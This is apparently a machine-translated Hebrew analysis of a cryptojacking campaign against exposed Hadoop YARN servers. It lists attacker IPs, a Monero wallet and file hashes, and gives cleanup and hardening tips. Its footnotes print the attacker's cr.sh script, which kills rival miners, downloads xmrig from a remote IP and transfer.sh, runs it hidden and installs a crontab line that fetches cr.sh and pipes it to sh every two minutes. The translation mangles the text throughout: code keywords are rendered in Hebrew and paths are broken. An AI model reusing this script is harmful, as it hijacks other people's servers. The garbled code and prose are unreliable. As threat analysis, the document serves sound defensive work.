לכולם יש קישוריות יציאת 22, ssh. עם זאת, אם הם נחשבים כתובות IP זדוני, למשל מתייחס מה הוא דיווח על הקישור https://www. joesandbox.com/index.php/analysis/49178/0/executively, שם מוכרז שימוש ב- powershell, מה שמעשיר את החיפוש אנו מוודאים שלכתובת ה- IP 192.99.142.232 יש טביעת אצבע זהה לזו של IP 85.214.102.143 הממוקמת בגרמניה ב זמינות ה- ISP Strato AG. עם זאת, לכתובת יש אישור 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b המחייב אותה גם ל- IPs הבאים: 85.214.125.15 (emma.smartmessaging.com) Debian OS מטרים. busware.de) מערכת ההפעלה דביאן.
|
מ |
כדי טביעת אצבע ssh |
טביעות אצבע |
|
192.99.142.232 |
85.214.102.143 |
85.214.125.15 |
|
85.214.60.153 |
לגבי IP 192.99.142.248, עיין בתרשים שלהלן, המציג את מה שהובא עד כה במסמך.
אין לך פרטים משמעותיים עבור כתובת ה- IP האחרת 192.99.142.226
עצה בטיחות
-
השתמש למעלה כדי לראות את התהליך ולהרוג את תהליך חריגה.
-
בדוק את בספרייה / tmp ו / var / tmp ומחק i פילה כמו Java, ppc, ppl3, config.json ו- w.conf
-
בדוק את רשימת הפעילויות crontab ולחסל אנומליות
-
ניתוח של יומני YARN, מאשרת את היישום חריגה, חיסול של עיבוד.
חיזוק אבטחה
-
הגדר את מדיניות הגישה באמצעות iptables o קבוצות אבטחה להגבלת הגישה ליציאות כגון 8088;
-
אם אין צורך בכך, אל תפתח את הממשק ברשת הציבורית ותשנה אותו בשיחות מקומיות או אינטרא-נט;
-
עדכן את Hadoop ל- 2.x ולאפשר אימות Kerberos כדי למנוע גישה אנונימית.
ועד אולימפי בינלאומי
כתובת הארנק
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
-
MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
-
MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
-
MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
-
MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
-
MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
-
MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
-
MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
-
MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
כתובות לפי סדר עדיפות
-
185.222.210.59 (נראה כמקור IP);
-
46.30.43.159 (חיבור לבריכה שלפולש, שכבת procollo + tcp);
-
179.60.146.10 (חיבור לבריכה שלפולש, שכבת procollo + tcp);
-
95.142.40.83 (קובץ להורדה של כריית נתונים);
-
95.142.40.81 (קובץ להורדה של כריית נתונים);
-
46.30.42.162 (קובץ להורדה של כריית נתונים);
-
192.99.142.248 (חיבור לפעילות התחמקות);
-
192.99.142.232 (חיבור לפעילות התחמקות);
-
192.99.142.226 (חיבור לפעילות התחמקות);
-
85.214.102.143 (טביעת אצבעות משותף עם כתובות לעיל);
-
85.214.125.15 (טביעת אצבעות משותף עם כתובות לעיל);
-
85.214.60.153 (טביעת אצבעות משותף עם כתובות שהוזכרו לעיל).
כתובות של חשד שייכות לזמינותפולש
|
185.154.52.117 (vz230686.eurodir.ru) |
|
185.154.52.161 (piar60.ru) |
|
185.154.52.181 (vz224405.eurodir.ru) |
|
185.154.52.236 (support.ru) |
|
185.154.53.108 (vz224405.eurodir.ru) |
|
185.154.53.137 (vz224405.eurodir.ru) |
|
185.154.53.190 (vz228963.eurodir.ru) |
|
185.154.53.249 (vz232259.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
185.154.53.65 (profshinservice.ru) |
|
185.154.53.67 (vz232259.eurodir.ru) |
|
185.154.53.72 (vz231895.eurodir.ru) |
|
46.30.41.182 (vz230501.eurodir.ru) |
|
46.30.41.207 (vz230806.eurodir.ru) |
|
46.30.41.51 (vz225213.eurodir.ru) |
|
46.30.41.80 (track.dev) |
|
46.30.42.162 (server.com) |
|
46.30.43.128 (vz228757.eurodir.ru) |
|
46.30.45.152 (vz230274.eurodir.ru) |
|
46.30.45.30 (shop.engine) |
|
46.30.45.91 (vz220153.eurodir.ru) |
|
46.30.47.115 (vz227413.eurodir.ru) |
|
46.30.47.157 (vz228859.eurodir.ru) |
|
95.142.39.109 (vz228627.eurodir.ru) |
|
95.142.39.151 (donotopen.ru) |
|
95.142.39.164 (vz232259.eurodir.ru) |
|
95.142.39.172 (hosted-by.wikhost.com) |
|
95.142.39.241 (shimshim.info) |
|
95.142.39.251 (vz232259.eurodir.ru) |
|
95.142.40.188 (vz232259.eurodir.ru) |
|
95.142.40.189 (vz232259.eurodir.ru) |
|
95.142.40.190 (vz232259.eurodir.ru) |
|
95.142.40.44 (vz229990.eurodir.ru) |
|
95.142.40.74 (vz232259.eurodir.ru) |
|
95.142.40.81 (vz228855.eurodir.ru) |
|
95.142.40.82 (vz228856.eurodir.ru) |
|
95.142.40.83 (vz228857.eurodir.ru) |
|
95.142.40.86 (kolos1952.ru) |
|
95.142.40.87 (regiister.ru) |
|
95.142.40.88 (buled.ru) |
|
95.142.40.89 (vz229526.eurodir.ru) |
|
95.142.39.233 (vz231616.eurodir.ru) |
|
185.154.53.46 (server.badstudio.ru) |
|
46.30.47.107 (vz227413.eurodir.ru) |
|
46.30.47.21 (vz227411.eurodir.ru) |
|
46.30.47.35 (vz227411.eurodir.ru) |
|
46.30.47.66 (vz227407.eurodir.ru) |
|
46.30.47.82 (vz227413.eurodir.ru) |
|
95.142.39.102 (vz222177.eurodir.ru) |
מסקנות
עבור אלה שהגיעו עד הסוף, זה נכון להסיק, מדגיש כיצד מערכות הפעלה כבר בשימוש תֶקֶן כגון אובונטו ו- Windows 7.
התהליך כולו הועתק גם על מערכות הפעלה כמו אלה שהוזכרו לעיל עם תוצאה חיובית, ניתן גם להניח כי מכשירי IoT.
אני חושב שזה מסובך מאוד להפריע או אפילו לשים לב לאיום דומה אם הוא מופנה אל IoTs, חוסר ידע של מערכות בסיסיות, חוסר אבטחה, אבל מעל לכל מערכות אבטחה נדירות אנו יכולים להשתמש כדי לנהל את השימוש IoTs. יומי.
לרוע המזל לא ביצעתי שום בדיקות על כל IoT, אז אני לא יכול לומר בוודאות את התפקוד הנכון של התהליך כולו המתואר.
אני רוצה לסיים עם פרובוקציה, תוך הדגשת היבט נוסף לגבי השימוש cryptominer. למעשה זה לא יכול להיות נשלל כי Cyber פשע משתמש i cryptominer לסבסד את מסעות הפרסום תוכנות זדוניות הרבה יותר מתוחכמים כמו אלה הטמונים APTs12 גם ממוצא parastatal, נשקלת האפשרות של מימון עצמו ובאישור הממשלה כי הקבוצה "האקר" עובד או הקשורים עימו שותפויות. גורמים הקשורים לאנונימיות מלאה מפעולות בתחום Cyber, לאפשר, שוליים גבוהים של הונאה, מה שהופך פעילויות כאלה רווחית במיוחד מנקודת המבט מוֹדִיעִין, דרך היכולת לנהל בקלות פעולות דגל שקר של "כתובת"ייחוס לצדדים שלישיים שאינם קשורים אליהם.
לבסוף, שיקול סופי על הקושי הקשור בביצוע ניתוחים אלה. הקושי שהקוראים אולי מצאו בקריאת האנליזה הוא המראה של הקושי בביצועו, אך אם אתה רוצה לשחק עם תפקיד לא שולי בלוח השחמט הקיברנטי, חיוני שיהיו אנשים מוכנים ומודעים, ויכולים לנתח וליישם התרופות הנדרשות על מערכות אמיתיות, בדרך כלל הרבה יותר מורכבות מאשר זו שיצרתי למטרות חינוכיות.
1 HDFS: HDFS מתייחס למערכת קבצים מבוזרת של Hadoop. זוהי מערכת קבצים שנוצרה בטכנולוגיית קוד פתוח חדש התומכת במערכת היררכית של קבצים וספריות המופצים על צמתי האחסון המנוהלים על ידי Hadoop. למידע נוסף: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: ממשק תכנות יישומים העברת מצב Representational. על כל אלה הם סימנים של המפתח של הקוד שימושי לקביעת האופן שבו הנתונים המשמשים את היישום צריך להיות מועבר.
3 באופן כללי אנחנו מדברים על סיר דבש כשמדובר במשהו נוצר במיוחד כדי למשוך תוקף, בפועל מדוברת במלכודת נוצרה כדי להבטיח כי תוקף מתגלה.
4 המונח כרייה מתייחס בדרך כלל לביצוע חישובים על מנת ליצור cryptocurrency באמצעות ביצוע חישובים מורכבים.
5 סורק הוא תוכנה באופן אוטומטי סורקת רשת עבור פגיעויות.
6 סקריפט אינו אלא קובץ המכיל רצף של פקודות.
7 בפרט, אתה יכול לראות בבירור כיצד להוריד ולהפעיל סקריפט שנקרא cr.sh מכתובת ה- IP 185.222.210.59 ואתה משתמש בפקודה sh & disownכלומר, התהליך מתבצע בתוך המופע של לחבוט הנוכחי של הטרמינל, ב רקע, אבל התהליך מנותק מהרשימה משרות di לחבוט (כלומר, התהליך אינו מופיע כ עבודה בחזית /רקע); ולכן הוא משמש למחיקה / הסרה של משימות או כדי לומר לקליפה שלא לשלוח אות HUP באמצעות הפקודה 'כתב ויתור'.
8 pkill-f קריפטונייט
pkill-f מתמשכת
pkill-f xmrig
pkill-f xmr-stak
pkill -f suppoie
#ps ax | grep / tmp / yarn | grep -v grep | xargs kill -9
חלק זה של הקוד נוגע בעיקר לתהליך הנתונים כריית הקיים, את המסמכים כדי לנקות, את התהליכים שיש להשלים, עם זאת, יש לנו מיד רמז חשוב, cryptonight (נראה בהמשך).
WGET = "wget -O"
אם [-s / usr / bin / curl];
אז
WGET = "curl -o";
fi
אם [-s / usr / bin / wget];
אז
WGET = "wget -O";
fi
f2 = "185.222.210.59"
החלק השני, לבדוק ולהקצות כמה משתנים, לקבוע אם הפקודות קיימות תלתל e wget ואם כן, הקצה אותם למשתנה WGET, f2 מקצה ערך IP.
למעשה, f2 הוא אחד שרת השתמשו כדי להוריד קבצים הקשורים לפעילות זדונית בתהליך.
downloadIfNeed ()
{
אם [! -f / tmp / java]; אז
הד "הקובץ לא נמצא!"
להורדה
fi
אם [-x "$ (command -v md5sum)"]
אז
סכום = $ (md5sum / tmp / java? awk '{print $ 1}')
סכום echo $
בתים
c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
הד "Java אישור"
;;
*)
הד "Java טועה"
sizeBefore = $ (du / tmp / java)
אם [-s / usr / bin / curl];
אז
WGET = "curl -k -o";
fi
אם [-s / usr / bin / wget];
אז
WGET = "wget --no-check-certificate -O";
fi
$ WGET / tmp / java https: // transfer.sh/ixQBE/zzz
sumAfter = $ (md5sum / tmp / java | awk '[הדפס $ 1}')
אם [-s / usr / bin / curl];
אז
הד "הורד מחדש $ sum $ size לפני אחרי $ sumAfter" `du / tmp / java`> /tmp/tmp.txt
תלתל -F "file = @ /tmp/tmp.txt" http: //$f2/re.php
fi
;;
esac
אחר
הד "לא md5sum"
להורדה
fi
}
הורד () {
f1 = $ (תלתל 185.222.210.59 / g.php)
אם [-z "$ f1"];
אז
f1 = $ (wget -q -O - 185.222.210.59 / g.php)
fi
אם [`getconf LONG_BIT` =" 64 "]
אז
$ WGET / tmp / java http: // $ f1 / xmrig_64
אחר
$ WGET / tmp / java http: // $ f1 / xmrig_32
fi
}
אם [! "$ (ps -fe | grep '/ tmp / java -c /tmp/w.conf' | grep -v grep)"];
אז
downloadIfNeed
chmod + x / tmp / ג 'אווה
$ WGET /tmp/w.conf http: //$f2/w.conf
nohup / tmp / java -c /tmp/w.conf> / dev / null 2> & 1 &
לישון 5
rm -rf /tmp/w.conf
אחר
הד "ריצה"
fi
אם crontab -l grep -q "185.222.210.59"
אז
הד "קרון קיים"
אחר
הד "Cron לא נמצא"
LDR = "wget -q -O -"
אם [-s / usr / bin / curl];
אז
LDR = "להתכרבל";
fi
אם [-s / usr / bin / wget];
אז
LDR = "wget -q -O -";
fi
(crontab -l 2> / dev / null; הד "* / 2 * * * * $ LDR http: // 185.222.210.59/cr.sh | sh> / dev / null 2> & 1") | crontab -
fi
החלק השלישי של הקוד קובע בעיקר אם / tmp / java הוא קובץ קיים וניתן לכתוב, ולאחר מכן לקבוע אם ערך MD5 תואם לאחד מהערכים MD5 המוצגים בקוד (נראה בהמשך את השניים שירים פילה). ב תסריט, משתנה LDR מוקצה. משתנה זה משמש בעיקר להורדת המדריך לאחסון תוכניות כריית וסוגים אחרים, באמצעות פקודות wget או סלסול, תלוי אם הפקודה נמצאת במערכת המארחת. חלק זה של הקוד הוא הליבה של הקוד, להוריד אם יש צורך (עם שיטת downloadIfNeed) ותמציות, בספרייה / tmp renominado ב ג 'אווה ההפעלה עבור נתונים כריית (בדיקת תודה ל getconf LONG_BIT אם ההפעלה חייבת להיות 32 או 64 קצת), להוריד את קובץ התצורה w.conf, להוסיף הרשאות ביצוע לתוכנית כריית ולאחר מכן מבצעת את הפקודה nohup רקע כריית (nohup היא פקודה המתעלמת מהאות SIGHUP, על מנת לאפשר את המשך הביצוע גם במקרה של ניתוק מהטרמינל או סיום של אמולטור הטרמינל).
לתכנת ולמחוק את קובץ התצורה, ואז לבדוק את המשימות ב- crontab, אם אין משימה תואמת, היא תוריד את המשימה להפעלת הסקריפט "* / 2 * * * * $ LDR http: // 185.222.210.59/cr .sh | sh> / dev / null 2> & 1 "נוסף אליו, כאשר $ LDR הוא wget -q -O - או תלתל (שהוזכר גם לעיל), המשימה פועלת אחת לשתי דקות (כפי שמוצג באיור, המציג את אפשרויות השדות המציינות את תדירות ביצוע הפקודה).
Lo תסריט מכיל שיטות להורדה עבור מספר שיחות מקוננות. שיטת הקלט היא downloadIfNeed. על ידי ציון טוב יותר, הפונקציה העיקרית של שיטה זו היא לבדוק MD5 של תוכנית תאריך כריית קיים, אם לא ניתן לאמת אותו או שהקובץ אינו קיים, פנה ישירות לשיטת ההורדה (בהתאם לשיטה המצוינת בסעיף תסריט) כדי להוריד את התוכנית כריית אם הקובץ קיים אך MD5 אינו תואם כראוי, התקשר לשיטת ההורדה. לאחר בדיקה שוב, אם האימות נכשל, נסו להוריד את תוכנית הכרייה מערוץ הורדות אחר https: // transfer.sh/WoGXx/zzz ובדקו שוב. לבסוף, התוצאות הרלוונטיות מדווחות ל re.php $ f2 של שרת היעד.
אם הוא קיים, שם הסינכרון הוא java.
ההורדה () שיטה השופטים כי המערכת מורידה את הגירסה המקביל של התוכנית כריית ממשאב האינטרנט הבא: http: // 185.222.210.59/g.php.
המשאב מחזירה כתובת IP נוספת להורדת קובץ ההפעלה הראשי, לאחר שההורדה הושלמה, הוא נבדק שוב והעותק שונה ל- ppc.
pkill-f logo4.jpg
pkill-f logo0.jpg
pkill-f logo9.jpg
crontab -l sed '/ logo4 / d' | crontab -
crontab -l sed '/ logo9 / d' | crontab -
crontab -l sed '/ logo0 / d' | crontab -
בחלק האחרון של התסריט יש כמה תהליכים, קבצים, תהליכי ניקוי crontab, שימוש pkill כדי לסיים את התהליך המספק את התנאים ולחסל כמה פעילות crontab.
9 מידע על קוד פתוח
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 קריאה לפרוצדורה מרוחקת, הוא מנגנון כללי לניהול יישומים שרת-לקוח.
12 איום מתקדם ומתמשך, סוג ההתקפות שבוצעו בדרך כלל על ידי ארגונים ממלכתיים.
(צילום: ארה"ב DoD)
